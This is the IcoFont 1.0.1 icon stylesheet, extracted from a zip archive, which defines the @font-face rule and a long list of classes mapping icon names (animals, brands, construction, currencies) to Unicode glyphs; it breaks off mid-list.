.icofont-rotate-90{-webkit-filter:none;filter:none;display:inline-block}.icofont-inverse{color:#fff}.sr-only{border:0;clip:rect(0,0,0,0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.sr-only-focusable:active,.sr-only-focusable:focus{clip:auto;height:auto;margin:0;overflow:visible;position:static;width:auto}PK!ٍ��w�w�icofont/icofont.cssnu&1i�/*! 
* @package IcoFont 
* @version 1.0.1 
* @author IcoFont https://icofont.com 
* @copyright Copyright (c) 2015 - 2018 IcoFont 
* @license - https://icofont.com/license/
*/

@font-face
{
 
  font-family: "IcoFont";
font-weight: normal;
font-style: "Regular";
src: url("./fonts/icofont.woff2") format("woff2"),
url("./fonts/icofont.woff") format("woff");
}

[class^="icofont-"], [class*=" icofont-"]
{
  font-family: 'IcoFont' !important;
  speak: none;
  font-style: normal;
  font-weight: normal;
  font-variant: normal;
  text-transform: none;
  white-space: nowrap;
  word-wrap: normal;
  direction: ltr;
  line-height: 1;
/* Better Font Rendering =========== */
  -webkit-font-feature-settings: "liga";
  -webkit-font-smoothing: antialiased;
}

.icofont-angry-monster:before
{
  content: "\e800";
}

.icofont-bathtub:before
{
  content: "\e801";
}

.icofont-bird-wings:before
{
  content: "\e802";
}

.icofont-bow:before
{
  content: "\e803";
}

.icofont-castle:before
{
  content: "\e804";
}

.icofont-circuit:before
{
  content: "\e805";
}

.icofont-crown-king:before
{
  content: "\e806";
}

.icofont-crown-queen:before
{
  content: "\e807";
}

.icofont-dart:before
{
  content: "\e808";
}

.icofont-disability-race:before
{
  content: "\e809";
}

.icofont-diving-goggle:before
{
  content: "\e80a";
}

.icofont-eye-open:before
{
  content: "\e80b";
}

.icofont-flora-flower:before
{
  content: "\e80c";
}

.icofont-flora:before
{
  content: "\e80d";
}

.icofont-gift-box:before
{
  content: "\e80e";
}

.icofont-halloween-pumpkin:before
{
  content: "\e80f";
}

.icofont-hand-power:before
{
  content: "\e810";
}

.icofont-hand-thunder:before
{
  content: "\e811";
}

.icofont-king-monster:before
{
  content: "\e812";
}

.icofont-love:before
{
  content: "\e813";
}

.icofont-magician-hat:before
{
  content: "\e814";
}

.icofont-native-american:before
{
  content: "\e815";
}

.icofont-owl-look:before
{
  content: "\e816";
}

.icofont-phoenix:before
{
  content: "\e817";
}

.icofont-robot-face:before
{
  content: "\e818";
}

.icofont-sand-clock:before
{
  content: "\e819";
}

.icofont-shield-alt:before
{
  content: "\e81a";
}

.icofont-ship-wheel:before
{
  content: "\e81b";
}

.icofont-skull-danger:before
{
  content: "\e81c";
}

.icofont-skull-face:before
{
  content: "\e81d";
}

.icofont-snowmobile:before
{
  content: "\e81e";
}

.icofont-space-shuttle:before
{
  content: "\e81f";
}

.icofont-star-shape:before
{
  content: "\e820";
}

.icofont-swirl:before
{
  content: "\e821";
}

.icofont-tattoo-wing:before
{
  content: "\e822";
}

.icofont-throne:before
{
  content: "\e823";
}

.icofont-tree-alt:before
{
  content: "\e824";
}

.icofont-triangle:before
{
  content: "\e825";
}

.icofont-unity-hand:before
{
  content: "\e826";
}

.icofont-weed:before
{
  content: "\e827";
}

.icofont-woman-bird:before
{
  content: "\e828";
}

.icofont-bat:before
{
  content: "\e829";
}

.icofont-bear-face:before
{
  content: "\e82a";
}

.icofont-bear-tracks:before
{
  content: "\e82b";
}

.icofont-bear:before
{
  content: "\e82c";
}

.icofont-bird-alt:before
{
  content: "\e82d";
}

.icofont-bird-flying:before
{
  content: "\e82e";
}

.icofont-bird:before
{
  content: "\e82f";
}

.icofont-birds:before
{
  content: "\e830";
}

.icofont-bone:before
{
  content: "\e831";
}

.icofont-bull:before
{
  content: "\e832";
}

.icofont-butterfly-alt:before
{
  content: "\e833";
}

.icofont-butterfly:before
{
  content: "\e834";
}

.icofont-camel-alt:before
{
  content: "\e835";
}

.icofont-camel-head:before
{
  content: "\e836";
}

.icofont-camel:before
{
  content: "\e837";
}

.icofont-cat-alt-1:before
{
  content: "\e838";
}

.icofont-cat-alt-2:before
{
  content: "\e839";
}

.icofont-cat-alt-3:before
{
  content: "\e83a";
}

.icofont-cat-dog:before
{
  content: "\e83b";
}

.icofont-cat-face:before
{
  content: "\e83c";
}

.icofont-cat:before
{
  content: "\e83d";
}

.icofont-cow-head:before
{
  content: "\e83e";
}

.icofont-cow:before
{
  content: "\e83f";
}

.icofont-crab:before
{
  content: "\e840";
}

.icofont-crocodile:before
{
  content: "\e841";
}

.icofont-deer-head:before
{
  content: "\e842";
}

.icofont-dog-alt:before
{
  content: "\e843";
}

.icofont-dog-barking:before
{
  content: "\e844";
}

.icofont-dog:before
{
  content: "\e845";
}

.icofont-dolphin:before
{
  content: "\e846";
}

.icofont-duck-tracks:before
{
  content: "\e847";
}

.icofont-eagle-head:before
{
  content: "\e848";
}

.icofont-eaten-fish:before
{
  content: "\e849";
}

.icofont-elephant-alt:before
{
  content: "\e84a";
}

.icofont-elephant-head-alt:before
{
  content: "\e84b";
}

.icofont-elephant-head:before
{
  content: "\e84c";
}

.icofont-elephant:before
{
  content: "\e84d";
}

.icofont-elk:before
{
  content: "\e84e";
}

.icofont-fish-1:before
{
  content: "\e84f";
}

.icofont-fish-2:before
{
  content: "\e850";
}

.icofont-fish-3:before
{
  content: "\e851";
}

.icofont-fish-4:before
{
  content: "\e852";
}

.icofont-fish-5:before
{
  content: "\e853";
}

.icofont-fish:before
{
  content: "\e854";
}

.icofont-fox-alt:before
{
  content: "\e855";
}

.icofont-fox:before
{
  content: "\e856";
}

.icofont-frog-tracks:before
{
  content: "\e857";
}

.icofont-frog:before
{
  content: "\e858";
}

.icofont-froggy:before
{
  content: "\e859";
}

.icofont-giraffe-head-1:before
{
  content: "\e85a";
}

.icofont-giraffe-head-2:before
{
  content: "\e85b";
}

.icofont-giraffe-head:before
{
  content: "\e85c";
}

.icofont-giraffe:before
{
  content: "\e85d";
}

.icofont-goat-head:before
{
  content: "\e85e";
}

.icofont-gorilla:before
{
  content: "\e85f";
}

.icofont-hen-tracks:before
{
  content: "\e860";
}

.icofont-horse-head-1:before
{
  content: "\e861";
}

.icofont-horse-head-2:before
{
  content: "\e862";
}

.icofont-horse-head:before
{
  content: "\e863";
}

.icofont-horse-tracks:before
{
  content: "\e864";
}

.icofont-jellyfish:before
{
  content: "\e865";
}

.icofont-kangaroo:before
{
  content: "\e866";
}

.icofont-lemur:before
{
  content: "\e867";
}

.icofont-lion-head-1:before
{
  content: "\e868";
}

.icofont-lion-head-2:before
{
  content: "\e869";
}

.icofont-lion-head:before
{
  content: "\e86a";
}

.icofont-lion:before
{
  content: "\e86b";
}

.icofont-monkey-2:before
{
  content: "\e86c";
}

.icofont-monkey-3:before
{
  content: "\e86d";
}

.icofont-monkey-face:before
{
  content: "\e86e";
}

.icofont-monkey:before
{
  content: "\e86f";
}

.icofont-octopus-alt:before
{
  content: "\e870";
}

.icofont-octopus:before
{
  content: "\e871";
}

.icofont-owl:before
{
  content: "\e872";
}

.icofont-panda-face:before
{
  content: "\e873";
}

.icofont-panda:before
{
  content: "\e874";
}

.icofont-panther:before
{
  content: "\e875";
}

.icofont-parrot-lip:before
{
  content: "\e876";
}

.icofont-parrot:before
{
  content: "\e877";
}

.icofont-paw:before
{
  content: "\e878";
}

.icofont-pelican:before
{
  content: "\e879";
}

.icofont-penguin:before
{
  content: "\e87a";
}

.icofont-pig-face:before
{
  content: "\e87b";
}

.icofont-pig:before
{
  content: "\e87c";
}

.icofont-pigeon-1:before
{
  content: "\e87d";
}

.icofont-pigeon-2:before
{
  content: "\e87e";
}

.icofont-pigeon:before
{
  content: "\e87f";
}

.icofont-rabbit:before
{
  content: "\e880";
}

.icofont-rat:before
{
  content: "\e881";
}

.icofont-rhino-head:before
{
  content: "\e882";
}

.icofont-rhino:before
{
  content: "\e883";
}

.icofont-rooster:before
{
  content: "\e884";
}

.icofont-seahorse:before
{
  content: "\e885";
}

.icofont-seal:before
{
  content: "\e886";
}

.icofont-shrimp-alt:before
{
  content: "\e887";
}

.icofont-shrimp:before
{
  content: "\e888";
}

.icofont-snail-1:before
{
  content: "\e889";
}

.icofont-snail-2:before
{
  content: "\e88a";
}

.icofont-snail-3:before
{
  content: "\e88b";
}

.icofont-snail:before
{
  content: "\e88c";
}

.icofont-snake:before
{
  content: "\e88d";
}

.icofont-squid:before
{
  content: "\e88e";
}

.icofont-squirrel:before
{
  content: "\e88f";
}

.icofont-tiger-face:before
{
  content: "\e890";
}

.icofont-tiger:before
{
  content: "\e891";
}

.icofont-turtle:before
{
  content: "\e892";
}

.icofont-whale:before
{
  content: "\e893";
}

.icofont-woodpecker:before
{
  content: "\e894";
}

.icofont-zebra:before
{
  content: "\e895";
}

.icofont-brand-acer:before
{
  content: "\e896";
}

.icofont-brand-adidas:before
{
  content: "\e897";
}

.icofont-brand-adobe:before
{
  content: "\e898";
}

.icofont-brand-air-new-zealand:before
{
  content: "\e899";
}

.icofont-brand-airbnb:before
{
  content: "\e89a";
}

.icofont-brand-aircell:before
{
  content: "\e89b";
}

.icofont-brand-airtel:before
{
  content: "\e89c";
}

.icofont-brand-alcatel:before
{
  content: "\e89d";
}

.icofont-brand-alibaba:before
{
  content: "\e89e";
}

.icofont-brand-aliexpress:before
{
  content: "\e89f";
}

.icofont-brand-alipay:before
{
  content: "\e8a0";
}

.icofont-brand-amazon:before
{
  content: "\e8a1";
}

.icofont-brand-amd:before
{
  content: "\e8a2";
}

.icofont-brand-american-airlines:before
{
  content: "\e8a3";
}

.icofont-brand-android-robot:before
{
  content: "\e8a4";
}

.icofont-brand-android:before
{
  content: "\e8a5";
}

.icofont-brand-aol:before
{
  content: "\e8a6";
}

.icofont-brand-apple:before
{
  content: "\e8a7";
}

.icofont-brand-appstore:before
{
  content: "\e8a8";
}

.icofont-brand-asus:before
{
  content: "\e8a9";
}

.icofont-brand-ati:before
{
  content: "\e8aa";
}

.icofont-brand-att:before
{
  content: "\e8ab";
}

.icofont-brand-audi:before
{
  content: "\e8ac";
}

.icofont-brand-axiata:before
{
  content: "\e8ad";
}

.icofont-brand-bada:before
{
  content: "\e8ae";
}

.icofont-brand-bbc:before
{
  content: "\e8af";
}

.icofont-brand-bing:before
{
  content: "\e8b0";
}

.icofont-brand-blackberry:before
{
  content: "\e8b1";
}

.icofont-brand-bmw:before
{
  content: "\e8b2";
}

.icofont-brand-box:before
{
  content: "\e8b3";
}

.icofont-brand-burger-king:before
{
  content: "\e8b4";
}

.icofont-brand-business-insider:before
{
  content: "\e8b5";
}

.icofont-brand-buzzfeed:before
{
  content: "\e8b6";
}

.icofont-brand-cannon:before
{
  content: "\e8b7";
}

.icofont-brand-casio:before
{
  content: "\e8b8";
}

.icofont-brand-china-mobile:before
{
  content: "\e8b9";
}

.icofont-brand-china-telecom:before
{
  content: "\e8ba";
}

.icofont-brand-china-unicom:before
{
  content: "\e8bb";
}

.icofont-brand-cisco:before
{
  content: "\e8bc";
}

.icofont-brand-citibank:before
{
  content: "\e8bd";
}

.icofont-brand-cnet:before
{
  content: "\e8be";
}

.icofont-brand-cnn:before
{
  content: "\e8bf";
}

.icofont-brand-cocal-cola:before
{
  content: "\e8c0";
}

.icofont-brand-compaq:before
{
  content: "\e8c1";
}

.icofont-brand-debian:before
{
  content: "\e8c2";
}

.icofont-brand-delicious:before
{
  content: "\e8c3";
}

.icofont-brand-dell:before
{
  content: "\e8c4";
}

.icofont-brand-designbump:before
{
  content: "\e8c5";
}

.icofont-brand-designfloat:before
{
  content: "\e8c6";
}

.icofont-brand-disney:before
{
  content: "\e8c7";
}

.icofont-brand-dodge:before
{
  content: "\e8c8";
}

.icofont-brand-dove:before
{
  content: "\e8c9";
}

.icofont-brand-drupal:before
{
  content: "\e8ca";
}

.icofont-brand-ebay:before
{
  content: "\e8cb";
}

.icofont-brand-eleven:before
{
  content: "\e8cc";
}

.icofont-brand-emirates:before
{
  content: "\e8cd";
}

.icofont-brand-espn:before
{
  content: "\e8ce";
}

.icofont-brand-etihad-airways:before
{
  content: "\e8cf";
}

.icofont-brand-etisalat:before
{
  content: "\e8d0";
}

.icofont-brand-etsy:before
{
  content: "\e8d1";
}

.icofont-brand-fastrack:before
{
  content: "\e8d2";
}

.icofont-brand-fedex:before
{
  content: "\e8d3";
}

.icofont-brand-ferrari:before
{
  content: "\e8d4";
}

.icofont-brand-fitbit:before
{
  content: "\e8d5";
}

.icofont-brand-flikr:before
{
  content: "\e8d6";
}

.icofont-brand-forbes:before
{
  content: "\e8d7";
}

.icofont-brand-foursquare:before
{
  content: "\e8d8";
}

.icofont-brand-foxconn:before
{
  content: "\e8d9";
}

.icofont-brand-fujitsu:before
{
  content: "\e8da";
}

.icofont-brand-general-electric:before
{
  content: "\e8db";
}

.icofont-brand-gillette:before
{
  content: "\e8dc";
}

.icofont-brand-gizmodo:before
{
  content: "\e8dd";
}

.icofont-brand-gnome:before
{
  content: "\e8de";
}

.icofont-brand-google:before
{
  content: "\e8df";
}

.icofont-brand-gopro:before
{
  content: "\e8e0";
}

.icofont-brand-gucci:before
{
  content: "\e8e1";
}

.icofont-brand-hallmark:before
{
  content: "\e8e2";
}

.icofont-brand-hi5:before
{
  content: "\e8e3";
}

.icofont-brand-honda:before
{
  content: "\e8e4";
}

.icofont-brand-hp:before
{
  content: "\e8e5";
}

.icofont-brand-hsbc:before
{
  content: "\e8e6";
}

.icofont-brand-htc:before
{
  content: "\e8e7";
}

.icofont-brand-huawei:before
{
  content: "\e8e8";
}

.icofont-brand-hulu:before
{
  content: "\e8e9";
}

.icofont-brand-hyundai:before
{
  content: "\e8ea";
}

.icofont-brand-ibm:before
{
  content: "\e8eb";
}

.icofont-brand-icofont:before
{
  content: "\e8ec";
}

.icofont-brand-icq:before
{
  content: "\e8ed";
}

.icofont-brand-ikea:before
{
  content: "\e8ee";
}

.icofont-brand-imdb:before
{
  content: "\e8ef";
}

.icofont-brand-indiegogo:before
{
  content: "\e8f0";
}

.icofont-brand-intel:before
{
  content: "\e8f1";
}

.icofont-brand-ipair:before
{
  content: "\e8f2";
}

.icofont-brand-jaguar:before
{
  content: "\e8f3";
}

.icofont-brand-java:before
{
  content: "\e8f4";
}

.icofont-brand-joomla:before
{
  content: "\e8f5";
}

.icofont-brand-kickstarter:before
{
  content: "\e8f6";
}

.icofont-brand-kik:before
{
  content: "\e8f7";
}

.icofont-brand-lastfm:before
{
  content: "\e8f8";
}

.icofont-brand-lego:before
{
  content: "\e8f9";
}

.icofont-brand-lenovo:before
{
  content: "\e8fa";
}

.icofont-brand-levis:before
{
  content: "\e8fb";
}

.icofont-brand-lexus:before
{
  content: "\e8fc";
}

.icofont-brand-lg:before
{
  content: "\e8fd";
}

.icofont-brand-life-hacker:before
{
  content: "\e8fe";
}

.icofont-brand-linux-mint:before
{
  content: "\e8ff";
}

.icofont-brand-linux:before
{
  content: "\e900";
}

.icofont-brand-lionix:before
{
  content: "\e901";
}

.icofont-brand-loreal:before
{
  content: "\e902";
}

.icofont-brand-louis-vuitton:before
{
  content: "\e903";
}

.icofont-brand-mac-os:before
{
  content: "\e904";
}

.icofont-brand-marvel-app:before
{
  content: "\e905";
}

.icofont-brand-mashable:before
{
  content: "\e906";
}

.icofont-brand-mazda:before
{
  content: "\e907";
}

.icofont-brand-mcdonals:before
{
  content: "\e908";
}

.icofont-brand-mercedes:before
{
  content: "\e909";
}

.icofont-brand-micromax:before
{
  content: "\e90a";
}

.icofont-brand-microsoft:before
{
  content: "\e90b";
}

.icofont-brand-mobileme:before
{
  content: "\e90c";
}

.icofont-brand-mobily:before
{
  content: "\e90d";
}

.icofont-brand-motorola:before
{
  content: "\e90e";
}

.icofont-brand-msi:before
{
  content: "\e90f";
}

.icofont-brand-mts:before
{
  content: "\e910";
}

.icofont-brand-myspace:before
{
  content: "\e911";
}

.icofont-brand-mytv:before
{
  content: "\e912";
}

.icofont-brand-nasa:before
{
  content: "\e913";
}

.icofont-brand-natgeo:before
{
  content: "\e914";
}

.icofont-brand-nbc:before
{
  content: "\e915";
}

.icofont-brand-nescafe:before
{
  content: "\e916";
}

.icofont-brand-nestle:before
{
  content: "\e917";
}

.icofont-brand-netflix:before
{
  content: "\e918";
}

.icofont-brand-nexus:before
{
  content: "\e919";
}

.icofont-brand-nike:before
{
  content: "\e91a";
}

.icofont-brand-nokia:before
{
  content: "\e91b";
}

.icofont-brand-nvidia:before
{
  content: "\e91c";
}

.icofont-brand-omega:before
{
  content: "\e91d";
}

.icofont-brand-opensuse:before
{
  content: "\e91e";
}

.icofont-brand-oracle:before
{
  content: "\e91f";
}

.icofont-brand-panasonic:before
{
  content: "\e920";
}

.icofont-brand-paypal:before
{
  content: "\e921";
}

.icofont-brand-pepsi:before
{
  content: "\e922";
}

.icofont-brand-philips:before
{
  content: "\e923";
}

.icofont-brand-pizza-hut:before
{
  content: "\e924";
}

.icofont-brand-playstation:before
{
  content: "\e925";
}

.icofont-brand-puma:before
{
  content: "\e926";
}

.icofont-brand-qatar-air:before
{
  content: "\e927";
}

.icofont-brand-qvc:before
{
  content: "\e928";
}

.icofont-brand-readernaut:before
{
  content: "\e929";
}

.icofont-brand-redbull:before
{
  content: "\e92a";
}

.icofont-brand-reebok:before
{
  content: "\e92b";
}

.icofont-brand-reuters:before
{
  content: "\e92c";
}

.icofont-brand-samsung:before
{
  content: "\e92d";
}

.icofont-brand-sap:before
{
  content: "\e92e";
}

.icofont-brand-saudia-airlines:before
{
  content: "\e92f";
}

.icofont-brand-scribd:before
{
  content: "\e930";
}

.icofont-brand-shell:before
{
  content: "\e931";
}

.icofont-brand-siemens:before
{
  content: "\e932";
}

.icofont-brand-sk-telecom:before
{
  content: "\e933";
}

.icofont-brand-slideshare:before
{
  content: "\e934";
}

.icofont-brand-smashing-magazine:before
{
  content: "\e935";
}

.icofont-brand-snapchat:before
{
  content: "\e936";
}

.icofont-brand-sony-ericsson:before
{
  content: "\e937";
}

.icofont-brand-sony:before
{
  content: "\e938";
}

.icofont-brand-soundcloud:before
{
  content: "\e939";
}

.icofont-brand-sprint:before
{
  content: "\e93a";
}

.icofont-brand-squidoo:before
{
  content: "\e93b";
}

.icofont-brand-starbucks:before
{
  content: "\e93c";
}

.icofont-brand-stc:before
{
  content: "\e93d";
}

.icofont-brand-steam:before
{
  content: "\e93e";
}

.icofont-brand-suzuki:before
{
  content: "\e93f";
}

.icofont-brand-symbian:before
{
  content: "\e940";
}

.icofont-brand-t-mobile:before
{
  content: "\e941";
}

.icofont-brand-tango:before
{
  content: "\e942";
}

.icofont-brand-target:before
{
  content: "\e943";
}

.icofont-brand-tata-indicom:before
{
  content: "\e944";
}

.icofont-brand-techcrunch:before
{
  content: "\e945";
}

.icofont-brand-telenor:before
{
  content: "\e946";
}

.icofont-brand-teliasonera:before
{
  content: "\e947";
}

.icofont-brand-tesla:before
{
  content: "\e948";
}

.icofont-brand-the-verge:before
{
  content: "\e949";
}

.icofont-brand-thenextweb:before
{
  content: "\e94a";
}

.icofont-brand-toshiba:before
{
  content: "\e94b";
}

.icofont-brand-toyota:before
{
  content: "\e94c";
}

.icofont-brand-tribenet:before
{
  content: "\e94d";
}

.icofont-brand-ubuntu:before
{
  content: "\e94e";
}

.icofont-brand-unilever:before
{
  content: "\e94f";
}

.icofont-brand-vaio:before
{
  content: "\e950";
}

.icofont-brand-verizon:before
{
  content: "\e951";
}

.icofont-brand-viber:before
{
  content: "\e952";
}

.icofont-brand-vodafone:before
{
  content: "\e953";
}

.icofont-brand-volkswagen:before
{
  content: "\e954";
}

.icofont-brand-walmart:before
{
  content: "\e955";
}

.icofont-brand-warnerbros:before
{
  content: "\e956";
}

.icofont-brand-whatsapp:before
{
  content: "\e957";
}

.icofont-brand-wikipedia:before
{
  content: "\e958";
}

.icofont-brand-windows:before
{
  content: "\e959";
}

.icofont-brand-wire:before
{
  content: "\e95a";
}

.icofont-brand-wordpress:before
{
  content: "\e95b";
}

.icofont-brand-xiaomi:before
{
  content: "\e95c";
}

.icofont-brand-yahoobuzz:before
{
  content: "\e95d";
}

.icofont-brand-yamaha:before
{
  content: "\e95e";
}

.icofont-brand-youtube:before
{
  content: "\e95f";
}

.icofont-brand-zain:before
{
  content: "\e960";
}

.icofont-bank-alt:before
{
  content: "\e961";
}

.icofont-bank:before
{
  content: "\e962";
}

.icofont-barcode:before
{
  content: "\e963";
}

.icofont-bill-alt:before
{
  content: "\e964";
}

.icofont-billboard:before
{
  content: "\e965";
}

.icofont-briefcase-1:before
{
  content: "\e966";
}

.icofont-briefcase-2:before
{
  content: "\e967";
}

.icofont-businessman:before
{
  content: "\e968";
}

.icofont-businesswoman:before
{
  content: "\e969";
}

.icofont-chair:before
{
  content: "\e96a";
}

.icofont-coins:before
{
  content: "\e96b";
}

.icofont-company:before
{
  content: "\e96c";
}

.icofont-contact-add:before
{
  content: "\e96d";
}

.icofont-files-stack:before
{
  content: "\e96e";
}

.icofont-handshake-deal:before
{
  content: "\e96f";
}

.icofont-id-card:before
{
  content: "\e970";
}

.icofont-meeting-add:before
{
  content: "\e971";
}

.icofont-money-bag:before
{
  content: "\e972";
}

.icofont-pie-chart:before
{
  content: "\e973";
}

.icofont-presentation-alt:before
{
  content: "\e974";
}

.icofont-presentation:before
{
  content: "\e975";
}

.icofont-stamp:before
{
  content: "\e976";
}

.icofont-stock-mobile:before
{
  content: "\e977";
}

.icofont-chart-arrows-axis:before
{
  content: "\e978";
}

.icofont-chart-bar-graph:before
{
  content: "\e979";
}

.icofont-chart-flow-1:before
{
  content: "\e97a";
}

.icofont-chart-flow-2:before
{
  content: "\e97b";
}

.icofont-chart-flow:before
{
  content: "\e97c";
}

.icofont-chart-growth:before
{
  content: "\e97d";
}

.icofont-chart-histogram-alt:before
{
  content: "\e97e";
}

.icofont-chart-histogram:before
{
  content: "\e97f";
}

.icofont-chart-line-alt:before
{
  content: "\e980";
}

.icofont-chart-line:before
{
  content: "\e981";
}

.icofont-chart-pie-alt:before
{
  content: "\e982";
}

.icofont-chart-pie:before
{
  content: "\e983";
}

.icofont-chart-radar-graph:before
{
  content: "\e984";
}

.icofont-architecture-alt:before
{
  content: "\e985";
}

.icofont-architecture:before
{
  content: "\e986";
}

.icofont-barricade:before
{
  content: "\e987";
}

.icofont-bolt:before
{
  content: "\e988";
}

.icofont-bricks:before
{
  content: "\e989";
}

.icofont-building-alt:before
{
  content: "\e98a";
}

.icofont-bull-dozer:before
{
  content: "\e98b";
}

.icofont-calculations:before
{
  content: "\e98c";
}

.icofont-cement-mix:before
{
  content: "\e98d";
}

.icofont-cement-mixer:before
{
  content: "\e98e";
}

.icofont-concrete-mixer:before
{
  content: "\e98f";
}

.icofont-danger-zone:before
{
  content: "\e990";
}

.icofont-drill:before
{
  content: "\e991";
}

.icofont-eco-energy:before
{
  content: "\e992";
}

.icofont-eco-environmen:before
{
  content: "\e993";
}

.icofont-energy-air:before
{
  content: "\e994";
}

.icofont-energy-oil:before
{
  content: "\e995";
}

.icofont-energy-savings:before
{
  content: "\e996";
}

.icofont-energy-solar:before
{
  content: "\e997";
}

.icofont-energy-water:before
{
  content: "\e998";
}

.icofont-engineer:before
{
  content: "\e999";
}

.icofont-fire-extinguisher-alt:before
{
  content: "\e99a";
}

.icofont-fire-extinguisher:before
{
  content: "\e99b";
}

.icofont-fix-tools:before
{
  content: "\e99c";
}

.icofont-fork-lift:before
{
  content: "\e99d";
}

.icofont-glue-oil:before
{
  content: "\e99e";
}

.icofont-hammer-alt:before
{
  content: "\e99f";
}

.icofont-hammer:before
{
  content: "\e9a0";
}

.icofont-help-robot:before
{
  content: "\e9a1";
}

.icofont-industries-1:before
{
  content: "\e9a2";
}

.icofont-industries-2:before
{
  content: "\e9a3";
}

.icofont-industries-3:before
{
  content: "\e9a4";
}

.icofont-industries-4:before
{
  content: "\e9a5";
}

.icofont-industries-5:before
{
  content: "\e9a6";
}

.icofont-industries:before
{
  content: "\e9a7";
}

.icofont-labour:before
{
  content: "\e9a8";
}

.icofont-mining:before
{
  content: "\e9a9";
}

.icofont-paint-brush:before
{
  content: "\e9aa";
}

.icofont-pollution:before
{
  content: "\e9ab";
}

.icofont-power-zone:before
{
  content: "\e9ac";
}

.icofont-radio-active:before
{
  content: "\e9ad";
}

.icofont-recycle-alt:before
{
  content: "\e9ae";
}

.icofont-recycling-man:before
{
  content: "\e9af";
}

.icofont-safety-hat-light:before
{
  content: "\e9b0";
}

.icofont-safety-hat:before
{
  content: "\e9b1";
}

.icofont-saw:before
{
  content: "\e9b2";
}

.icofont-screw-driver:before
{
  content: "\e9b3";
}

.icofont-tools-1:before
{
  content: "\e9b4";
}

.icofont-tools-bag:before
{
  content: "\e9b5";
}

.icofont-tow-truck:before
{
  content: "\e9b6";
}

.icofont-trolley:before
{
  content: "\e9b7";
}

.icofont-trowel:before
{
  content: "\e9b8";
}

.icofont-under-construction-alt:before
{
  content: "\e9b9";
}

.icofont-under-construction:before
{
  content: "\e9ba";
}

.icofont-vehicle-cement:before
{
  content: "\e9bb";
}

.icofont-vehicle-crane:before
{
  content: "\e9bc";
}

.icofont-vehicle-delivery-van:before
{
  content: "\e9bd";
}

.icofont-vehicle-dozer:before
{
  content: "\e9be";
}

.icofont-vehicle-excavator:before
{
  content: "\e9bf";
}

.icofont-vehicle-trucktor:before
{
  content: "\e9c0";
}

.icofont-vehicle-wrecking:before
{
  content: "\e9c1";
}

.icofont-worker:before
{
  content: "\e9c2";
}

.icofont-workers-group:before
{
  content: "\e9c3";
}

.icofont-wrench:before
{
  content: "\e9c4";
}

.icofont-afghani-false:before
{
  content: "\e9c5";
}

.icofont-afghani-minus:before
{
  content: "\e9c6";
}

.icofont-afghani-plus:before
{
  content: "\e9c7";
}

.icofont-afghani-true:before
{
  content: "\e9c8";
}

.icofont-afghani:before
{
  content: "\e9c9";
}

.icofont-baht-false:before
{
  content: "\e9ca";
}

.icofont-baht-minus:before
{
  content: "\e9cb";
}

.icofont-baht-plus:before
{
  content: "\e9cc";
}

.icofont-baht-true:before
{
  content: "\e9cd";
}

.icofont-baht:before
{
  content: "\e9ce";
}

.icofont-bitcoin-false:before
{
  content: "\e9cf";
}

.icofont-bitcoin-minus:before
{
  content: "\e9d0";
}

.icofont-bitcoin-plus:before
{
  content: "\e9d1";
}

.icofont-bitcoin-true:before
{
  content: "\e9d2";
}

.icofont-bitcoin:before
{
  content: "\e9d3";
}

.icofont-dollar-flase:before
{
  content: "\e9d4";
}

.icofont-dollar-minus:before
{
  content: "\e9d5";
}

.icofont-dollar-plus:before
{
  content: "\e9d6";
}

.icofont-dollar-true:before
{
  content: "\e9d7";
}

.icofont-dollar:before
{
  content: "\e9d8";
}

.icofont-dong-false:before
{
  content: "\e9d9";
}

.icofont-dong-minus:before
{
  content: "\e9da";
}

.icofont-dong-plus:before
{
  content: "\e9db";
}

.icofont-dong-true:before
{
  content: "\e9dc";
}

.icofont-dong:before
{
  content: "\e9dd";
}

.icofont-euro-false:before
{
  content: "\e9de";
}

.icofont-euro-minus:before
{
  content: "\e9df";
}

.icofont-euro-plus:before
{
  content: "\e9e0";
}

.icofont-euro-true:before
{
  content: "\e9e1";
}

.icofont-euro:before
{
  content: "\e9e2";
}

.icofont-frank-false:before
{
  content: "\e9e3";
}

.icofont-frank-minus:before
{
  content: "\e9e4";
}

.icofont-frank-plus:before
{
  content: "\e9e5";
}

.icofont-frank-true:before
{
  content: "\e9e6";
}

.icofont-frank:before
{
  content: "\e9e7";
}

.icofont-hryvnia-false:before
{
  content: "\e9e8";
}

.icofont-hryvnia-minus:before
{
  content: "\e9e9";
}

.icofont-hryvnia-plus:before
{
  content: "\e9ea";
}

.icofont-hryvnia-true:before
{
  content: "\e9eb";
}

.icofont-hryvnia:before
{
  content: "\e9ec";
}

.icofont-lira-false:before
{
  content: "\e9ed";
}

.icofont-lira-minus:before
{
  content: "\e9ee";
}

.icofont-lira-plus:before
{
  content: "\e9ef";
}

.icofont-lira-true:before
{
  content: "\e9f0";
}

.icofont-lira:before
{
  content: "\e9f1";
}

.icofont-peseta-false:before
{
  content: "\e9f2";
}

.icofont-peseta-minus:before
{
  content: "\e9f3";
}

.icofont-peseta-plus:before
{
  content: "\e9f4";
}

.icofont-peseta-true:before
{
  content: "\e9f5";
}

.icofont-peseta:before
{
  content: "\e9f6";
}

.icofont-peso-false:before
{
  content: "\e9f7";
}

.icofont-peso-minus:before
{
  content: "\e9f8";
}

.icofont-peso-plus:before
{
  content: "\e9f9";
}

.icofont-peso-true:before
{
  content: "\e9fa";
}

.icofont-peso:before
{
  content: "\e9fb";
}

.icofont-pound-false:before
{
  content: "\e9fc";
}

.icofont-pound-minus:before
{
  content: "\e9fd";
}

.icofont-pound-plus:before
{
  content: "\e9fe";
}

.icofont-pound-true:before
{
  content: "\e9ff";
}

.icofont-pound:before
{
  content: "\ea00";
}

.icofont-renminbi-false:before
{
  content: "\ea01";
}

.icofont-renminbi-minus:before
{
  content: "\ea02";
}

.icofont-renminbi-plus:before
{
  content: "\ea03";
}

.icofont-renminbi-true:before
{
  content: "\ea04";
}

.icofont-renminbi:before
{
  content: "\ea05";
}

.icofont-riyal-false:before
{
  content: "\ea06";
}

.icofont-riyal-minus:before
{
  content: "\ea07";
}

.icofont-riyal-plus:before
{
  content: "\ea08";
}

.icofont-riyal-true:before
{
  content: "\ea09";
}

.icofont-riyal:before
{
  content: "\ea0a";
}

.icofont-rouble-false:before
{
  content: "\ea0b";
}

.icofont-rouble-minus:before
{
  content: "\ea0c";
}

.icofont-rouble-plus:before
{
  content: "\ea0d";
}

.icofont-rouble-true:before
{
  content: "\ea0e";
}

.icofont-rouble:before
{
  content: "\ea0f";
}

.icofont-rupee-false:before
{
  content: "\ea10";
}

.icofont-rupee-minus:before
{
  content: "\ea11";
}

.icofont-rupee-plus:before
{
